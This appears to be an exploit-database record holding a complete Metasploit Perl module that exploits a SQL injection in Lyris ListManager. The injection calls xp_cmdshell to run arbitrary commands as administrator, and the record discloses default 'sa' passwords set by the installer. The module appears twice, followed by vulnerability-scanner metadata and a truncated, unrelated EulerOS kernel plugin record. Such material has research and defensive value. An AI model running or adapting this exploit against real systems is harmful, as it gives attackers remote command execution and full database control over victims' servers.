ID 1337DAY-ID-8650 Type zdt Reporter H D Moore Modified 2005-12-09T00:00:00
Description
Exploit for unknown platform in category remote exploits
===============================================================
Lyris ListManager Read Message Attachment SQL Injection Exploit
===============================================================
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::lyris_attachment_mssql;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Lyris ListManager Attachment SQL Injection (MSSQL)',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ ],
'OS' => [ 'win32' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 1000,
'Keys' => ['cmd'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a SQL injection flaw in the Lyris ListManager
software for Microsoft SQL Server. This flaw allows for arbitrary commands
to be executed with administrative privileges by calling the xp_cmdshell
stored procedure. Additionally, a window of opportunity is opened during the
ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'
for a 5-10 minute period. After the installer finishes, the password is
permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).
}),
'Refs' =>
[
['URL', 'http://metasploit.com/research/vulns/lyris_listmanager/'],
['OSVDB', '21548'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['No target needed.'],
],
'Keys' => ['lyris'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
my $r = $s->Recv(-1, 5);
if ($r =~ /Unclosed quotation mark before/) {
$self->PrintLine("[*] Vulnerable installation detected ;)");
return $self->CheckCode('Detected');
}
if ($r =~ /SQL error reported from Lyris/) {
$self->PrintLine("[*] Vulnerable installation, but not running MSSQL.");
return $self->CheckCode('Safe');
}
if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {
$self->PrintLine("[*] This system appears to be patched");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Unknown response, patched or invalid target.");
return $self->CheckCode('Safe');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
my $sql =
'DECLARE @X NVARCHAR(4000);'.
'SET @X= ';
foreach my $c (unpack('C*', $cmd)) {
$sql .= "CHAR($c) + ";
}
$sql .= "'\x20';";
$sql .= 'EXEC MASTER..XP_CMDSHELL @X';
my $url = "/read/attachment/1;".$self->URLEncode($sql).";--";
my $request =
"GET $url HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine("[*] Waiting for a response...");
$s->Recv(-1, 10);
$self->Handler($s);
$s->Close();
return;
}
sub URLEncode {
my $self = shift;
my $data = shift;
my $res;
foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}
1;
# 0day.today [2018-02-18] #
{"hash": "73a2f2c6059b507c34f2c12ac7be05f643264417b154dc9e114fbe834e2d29e1", "id": "1337DAY-ID-8650", "lastseen": "2018-02-18T17:25:16", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d3a7c6674c654c42a759624e9fffb550", "key": "href"}, {"hash": "415344aa00a96bd4ac0258de9f901cab", "key": "modified"}, {"hash": "415344aa00a96bd4ac0258de9f901cab", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7c78d921ec0b49e327e8f4b71ef3daa2", "key": "reporter"}, {"hash": "8469bf1f0667ac16e2c446e4d738526e", "key": "sourceData"}, {"hash": "1d9ffa9532ceef6cedaac3bfc317d519", "key": "sourceHref"}, {"hash": "ae29c7003add0c4edafa1f8b32a4956f", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2018-02-18T17:25:16"}, "dependencies": {"references": [{"type": "nessus", "idList": ["VIRTUOZZO_VZA-2018-041.NASL", "UBUNTU_USN-3422-1.NASL", "VIRTUOZZO_VZLSA-2017-0933.NASL", "EULEROS_SA-2017-1071.NASL", "EULEROS_SA-2017-1072.NASL", "ORACLELINUX_ELSA-2017-0933-1.NASL", "CENTOS_RHSA-2017-0933.NASL", "REDHAT-RHSA-2017-0932.NASL", "SL_20170412_KERNEL_ON_SL7_X.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843312", "OPENVAS:1361412562310811496", "OPENVAS:1361412562310811497", "OPENVAS:1361412562310811498", "OPENVAS:1361412562310811495", "OPENVAS:1361412562310882694", "OPENVAS:1361412562310871796"]}, {"type": "ubuntu", "idList": ["USN-3422-2", "USN-3422-1"]}, {"type": "kaspersky", "idList": ["KLA11084"]}, {"type": "centos", "idList": ["CESA-2017:0933"]}], "modified": "2018-02-18T17:25:16"}, "vulnersScore": 1.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8650", "description": "Exploit for unknown platform in category remote exploits", "title": "Lyris ListManager Read Message Attachment SQL Injection Exploit", "history": [{"bulletin": {"hash": "889eee17f82d9371f795823ec5520490c22050eb9fbf4110186556297564bbb2", "id": "1337DAY-ID-8650", "lastseen": "2016-04-19T23:32:25", "enchantments": {"score": {"value": 9.3, "modified": "2016-04-19T23:32:25"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "7c78d921ec0b49e327e8f4b71ef3daa2", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ae29c7003add0c4edafa1f8b32a4956f", "key": "title"}, {"hash": "9267ea6a6a18b3c3b98aa01c3c582d40", "key": "sourceData"}, {"hash": "415344aa00a96bd4ac0258de9f901cab", "key": "published"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "653b6e76aed7da4ffaff74198ede7af0", "key": "href"}, {"hash": "48ebf783cdd5811fcf76dfe0b7eb453c", "key": "sourceHref"}, {"hash": "415344aa00a96bd4ac0258de9f901cab", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8650", "description": "Exploit for unknown platform in category remote exploits", "viewCount": 0, "title": "Lyris ListManager Read Message Attachment SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===============================================================\r\nLyris ListManager Read Message Attachment SQL Injection Exploit\r\n===============================================================\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::lyris_attachment_mssql;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\t'Name' => 'Lyris ListManager Attachment SQL Injection (MSSQL)',\r\n\t'Version' => '$Revision: 1.2 $',\r\n\t'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],\r\n\t'Arch' => [ ],\r\n\t'OS' => [ 'win32' ],\r\n\t'Priv' => 1,\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 80],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t \t'Space' => 1000,\r\n\t\t'Keys' => ['cmd'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n\t\tThis module exploits a SQL injection flaw in the Lyris ListManager\r\n\tsoftware for Microsoft SQL Server. This flaw allows for arbitrary commands\r\n\tto be executed with administrative privileges by calling the xp_cmdshell\r\n\tstored procedure. Additionally, a window of opportunity is opened during the\r\n\tListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'\r\n\tfor a 5-10 minute period. After the installer finishes, the password is\r\n\tpermanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['URL', 'http://metasploit.com/research/vulns/lyris_listmanager/'],\r\n\t\t['OSVDB', '21548'],\r\n\t ],\r\n\t \r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t['No target needed.'],\r\n\t ],\r\n\r\n\t'Keys' => ['lyris'],\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Check {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn $self->CheckCode('Connect');\r\n\t}\r\n\r\n\t$s->Send(\"GET /read/attachment/' HTTP/1.1\\r\\nHost: $target_host:$target_port\\r\\n\\r\\n\");\r\n\r\n\tmy $r = $s->Recv(-1, 5);\r\n\r\n\tif ($r =~ /Unclosed quotation mark before/) {\r\n\t\t$self->PrintLine(\"[*] Vulnerable installation detected ;)\");\r\n\t\treturn $self->CheckCode('Detected');\r\n\t}\r\n\t\r\n\tif ($r =~ /SQL error reported from Lyris/) {\r\n\t\t$self->PrintLine(\"[*] Vulnerable installation, but not running MSSQL.\");\r\n\t\treturn $self->CheckCode('Safe');\r\n\t}\r\n\t\r\n\tif ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {\r\n\t\t$self->PrintLine(\"[*] This system appears to be patched\");\r\n\t\treturn $self->CheckCode('Safe');\t\r\n\t}\r\n\t\r\n\t$self->PrintLine(\"[*] Unknown response, patched or invalid target.\");\r\n\treturn $self->CheckCode('Safe');\r\n}\r\n\r\nsub Exploit {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\r\n\tmy $cmd = $self->GetVar('EncodedPayload')->RawPayload;\r\n\r\n\tmy $sql = \r\n\t\t'DECLARE @X NVARCHAR(4000);'.\r\n\t\t'SET @X= ';\r\n\r\n\tforeach my $c (unpack('C*', $cmd)) {\r\n\t\t$sql .= \"CHAR($c) + \";\r\n\t}\r\n\t$sql .= \"'\\x20';\";\r\n\t$sql .= 'EXEC MASTER..XP_CMDSHELL @X';\r\n\r\n\tmy $url = \"/read/attachment/1;\".$self->URLEncode($sql).\";--\";\r\n\r\n\r\n\tmy $request =\r\n\t \"GET $url HTTP/1.1\\r\\n\".\r\n\t \"Host: $target_host:$target_port\\r\\n\\r\\n\";\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Sending \" .length($request) . \" bytes to remote host.\");\r\n\t$s->Send($request);\r\n\r\n\t$self->PrintLine(\"[*] Waiting for a response...\");\r\n\t$s->Recv(-1, 10);\r\n\t$self->Handler($s);\r\n\t$s->Close();\r\n\treturn;\r\n}\r\n\r\nsub URLEncode {\r\n\tmy $self = shift;\r\n\tmy $data = shift;\r\n\tmy $res;\r\n\r\n\tforeach my $c (unpack('C*', $data)) {\r\n\t\tif (\r\n\t\t\t($c >= 0x30 && $c <= 0x39) ||\r\n\t\t\t($c >= 0x41 && $c <= 0x5A) ||\r\n\t\t\t($c >= 0x61 && $c <= 0x7A)\r\n\t\t ) {\r\n\t\t\t$res .= chr($c);\r\n\t\t} else {\r\n\t\t\t$res .= sprintf(\"%%%.2x\", $c);\r\n\t\t}\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\n1;\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2005-12-09T00:00:00", "references": [], "reporter": "H D Moore", "modified": "2005-12-09T00:00:00", "href": "http://0day.today/exploit/description/8650"}, "lastseen": "2016-04-19T23:32:25", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===============================================================\r\nLyris ListManager Read Message Attachment SQL Injection Exploit\r\n===============================================================\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::lyris_attachment_mssql;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\t'Name' => 'Lyris ListManager Attachment SQL Injection (MSSQL)',\r\n\t'Version' => '$Revision: 1.2 $',\r\n\t'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],\r\n\t'Arch' => [ ],\r\n\t'OS' => [ 'win32' ],\r\n\t'Priv' => 1,\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 80],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t \t'Space' => 1000,\r\n\t\t'Keys' => ['cmd'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n\t\tThis module exploits a SQL injection flaw in the Lyris ListManager\r\n\tsoftware for Microsoft SQL Server. This flaw allows for arbitrary commands\r\n\tto be executed with administrative privileges by calling the xp_cmdshell\r\n\tstored procedure. Additionally, a window of opportunity is opened during the\r\n\tListManager for MSDE install process; the 'sa' account is set to the password 'lminstall'\r\n\tfor a 5-10 minute period. After the installer finishes, the password is\r\n\tpermanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number).\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['URL', 'http://metasploit.com/research/vulns/lyris_listmanager/'],\r\n\t\t['OSVDB', '21548'],\r\n\t ],\r\n\t \r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t['No target needed.'],\r\n\t ],\r\n\r\n\t'Keys' => ['lyris'],\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Check {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn $self->CheckCode('Connect');\r\n\t}\r\n\r\n\t$s->Send(\"GET /read/attachment/' HTTP/1.1\\r\\nHost: $target_host:$target_port\\r\\n\\r\\n\");\r\n\r\n\tmy $r = $s->Recv(-1, 5);\r\n\r\n\tif ($r =~ /Unclosed quotation mark before/) {\r\n\t\t$self->PrintLine(\"[*] Vulnerable installation detected ;)\");\r\n\t\treturn $self->CheckCode('Detected');\r\n\t}\r\n\t\r\n\tif ($r =~ /SQL error reported from Lyris/) {\r\n\t\t$self->PrintLine(\"[*] Vulnerable installation, but not running MSSQL.\");\r\n\t\treturn $self->CheckCode('Safe');\r\n\t}\r\n\t\r\n\tif ($r =~ /ListManagerWeb.*Content-Length: 0/sm) {\r\n\t\t$self->PrintLine(\"[*] This system appears to be patched\");\r\n\t\treturn $self->CheckCode('Safe');\t\r\n\t}\r\n\t\r\n\t$self->PrintLine(\"[*] Unknown response, patched or invalid target.\");\r\n\treturn $self->CheckCode('Safe');\r\n}\r\n\r\nsub Exploit {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\r\n\tmy $cmd = $self->GetVar('EncodedPayload')->RawPayload;\r\n\r\n\tmy $sql = \r\n\t\t'DECLARE @X NVARCHAR(4000);'.\r\n\t\t'SET @X= ';\r\n\r\n\tforeach my $c (unpack('C*', $cmd)) {\r\n\t\t$sql .= \"CHAR($c) + \";\r\n\t}\r\n\t$sql .= \"'\\x20';\";\r\n\t$sql .= 'EXEC MASTER..XP_CMDSHELL @X';\r\n\r\n\tmy $url = \"/read/attachment/1;\".$self->URLEncode($sql).\";--\";\r\n\r\n\r\n\tmy $request =\r\n\t \"GET $url HTTP/1.1\\r\\n\".\r\n\t \"Host: $target_host:$target_port\\r\\n\\r\\n\";\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Sending \" .length($request) . \" bytes to remote host.\");\r\n\t$s->Send($request);\r\n\r\n\t$self->PrintLine(\"[*] Waiting for a response...\");\r\n\t$s->Recv(-1, 10);\r\n\t$self->Handler($s);\r\n\t$s->Close();\r\n\treturn;\r\n}\r\n\r\nsub URLEncode {\r\n\tmy $self = shift;\r\n\tmy $data = shift;\r\n\tmy $res;\r\n\r\n\tforeach my $c (unpack('C*', $data)) {\r\n\t\tif (\r\n\t\t\t($c >= 0x30 && $c <= 0x39) ||\r\n\t\t\t($c >= 0x41 && $c <= 0x5A) ||\r\n\t\t\t($c >= 0x61 && $c <= 0x7A)\r\n\t\t ) {\r\n\t\t\t$res .= chr($c);\r\n\t\t} else {\r\n\t\t\t$res .= sprintf(\"%%%.2x\", $c);\r\n\t\t}\r\n\t}\r\n\treturn $res;\r\n}\r\n\r\n1;\r\n\r\n\r\n\n# 0day.today [2018-02-18] #", "published": "2005-12-09T00:00:00", "references": [], "reporter": "H D Moore", "modified": "2005-12-09T00:00:00", "href": "https://0day.today/exploit/description/8650"}
{"nessus": [{"lastseen": "2019-12-13T06:27:20", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The walk_hugetlb_range() function in ", "modified": "2019-12-02T00:00:00", "id": "EULEROS_SA-2019-1538.NASL", "href": "https://www.tenable.com/plugins/nessus/124991", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1538)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124991);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2013-6763\",\n \"CVE-2013-7339\",\n \"CVE-2014-0038\",\n \"CVE-2014-2039\",\n \"CVE-2015-1593\",\n \"CVE-2016-3070\",\n \"CVE-2016-6136\",\n \"CVE-2016-8650\",\n \"CVE-2017-15129\",\n \"CVE-2017-16994\",\n \"CVE-2017-18174\",\n \"CVE-2017-9059\",\n \"CVE-2018-10124\",\n \"CVE-2018-1118\",\n \"CVE-2018-3639\",\n \"CVE-2018-5848\",\n \"CVE-2018-7566\",\n \"CVE-2018-7754\",\n \"CVE-2019-8912\",\n \"CVE-2019-9003\"\n );\n script_bugtraq_id(\n 63707,\n 65255,\n 65700,\n 66351,\n 72607\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1538)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The walk_hugetlb_range() function in 'mm/pagewalk.c'\n file in the Linux kernel from v4.0-rc1 through\n v4.15-rc1 mishandles holes in hugetlb ranges. This\n allows local users to obtain sensitive information from\n uninitialized kernel memory via crafted use of the\n mincore() system call.(CVE-2017-16994)\n\n - In the Linux kernel before 4.7, the amd_gpio_remove\n function in drivers/pinctrl/pinctrl-amd.c calls the\n pinctrl_unregister function, leading to a double\n free.(CVE-2017-18174)\n\n - In the Linux kernel through 4.20.11, af_alg_release()\n in crypto/af_alg.c neglects to set a NULL value for a\n certain structure member, which leads to a\n use-after-free in sockfs_setattr.(CVE-2019-8912)\n\n - A security flaw was found in the Linux kernel that an\n attempt to move page mapped by AIO ring buffer to the\n other node triggers NULL pointer dereference at\n trace_writeback_dirty_page(), because\n aio_fs_backing_dev_info.dev is 0.(CVE-2016-3070)\n\n - The NFSv4 implementation in the Linux kernel through\n 4.11.1 allows local users to cause a denial of service\n (resource consumption) by leveraging improper channel\n callback shutdown when unmounting an NFSv4 filesystem,\n aka a 'module reference and kernel daemon'\n leak.(CVE-2017-9059)\n\n - When creating audit records for parameters to executed\n children processes, an attacker can convince the Linux\n kernel audit subsystem can create corrupt records which\n may allow an attacker to misrepresent or evade logging\n of executing commands.(CVE-2016-6136)\n\n - A use-after-free vulnerability was found in a network\n namespaces code affecting the Linux kernel since\n v4.0-rc1 through v4.15-rc5. The function\n get_net_ns_by_id() does not check for the net::count\n value after it has found a peer network in netns_ids\n idr which could lead to double free and memory\n corruption. This vulnerability could allow an\n unprivileged local user to induce kernel memory\n corruption on the system, leading to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out, although it is thought to be\n unlikely.(CVE-2017-15129)\n\n - A NULL pointer dereference flaw was found in the\n rds_ib_laddr_check() function in the Linux kernel's\n implementation of Reliable Datagram Sockets (RDS). A\n local, unprivileged user could use this flaw to crash\n the system.(CVE-2013-7339)\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key.(CVE-2016-8650)\n\n - The uio_mmap_physical function in drivers/uio/uio.c in\n the Linux kernel before 3.12 does not validate the size\n of a memory block, which allows local users to cause a\n denial of service (memory corruption) or possibly gain\n privileges via crafted mmap operations, a different\n vulnerability than CVE-2013-4511.(CVE-2013-6763)\n\n - In the Linux kernel before 4.20.5, attackers can\n trigger a drivers/char/ipmi/ipmi_msghandler.c\n use-after-free and OOPS by arranging for certain\n simultaneous execution of the code, as demonstrated by\n a 'service ipmievd restart' loop.(CVE-2019-9003)\n\n - An integer overflow flaw was found in the way the Linux\n kernel randomized the stack for processes on certain\n 64-bit architecture systems, such as x86-64, causing\n the stack entropy to be reduced by four.(CVE-2015-1593)\n\n - The compat_sys_recvmmsg function in net/compat.c in the\n Linux kernel before 3.13.2, when CONFIG_X86_X32 is\n enabled, allows local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer\n parameter.(CVE-2014-0038)\n\n - The kill_something_info function in kernel/signal.c in\n the Linux kernel before 4.13, when an unspecified\n architecture and compiler is used, might allow local\n users to cause a denial of service via an INT_MIN\n argument.(CVE-2018-10124)\n\n - arch/s390/kernel/head64.S in the Linux kernel before\n 3.13.5 on the s390 platform does not properly handle\n attempted use of the linkage stack, which allows local\n users to cause a denial of service (system crash) by\n executing a crafted instruction.(CVE-2014-2039)\n\n - A flaw was found in the Linux kernel in that the\n aoedisk_debugfs_show() function in\n drivers/block/aoe/aoeblk.c allows local users to obtain\n some kernel address information by reading a debugfs\n file. This address is not useful to commit a further\n attack.(CVE-2018-7754)\n\n - ALSA sequencer core initializes the event pool on\n demand by invoking snd_seq_pool_init() when the first\n write happens and the pool is empty. A user can reset\n the pool size manually via ioctl concurrently, and this\n may lead to UAF or out-of-bound access.(CVE-2018-7566)\n\n - In the function wmi_set_ie() in the Linux kernel the\n length validation code does not handle unsigned integer\n overflow properly. As a result, a large value of the\n 'ie_len' argument can cause a buffer overflow and thus\n a memory corruption leading to a system crash or other\n or unspecified impact. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2018-5848)\n\n - The Linux kernel does not properly initialize memory in\n messages passed between virtual guests and the host\n operating system in the vhost/vhost.c:vhost_new_msg()\n function. This can allow local privileged users to read\n some kernel memory contents when reading from the\n /dev/vhost-net device file.(CVE-2018-1118)\n\n - Systems with microprocessors utilizing speculative\n execution and speculative execution of memory reads\n before the addresses of all prior memory writes are\n known may allow unauthorized disclosure of information\n to an attacker with local user access via a\n side-channel analysis, aka Speculative Store Bypass\n (SSB), Variant 4.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1538\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb2590a9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n 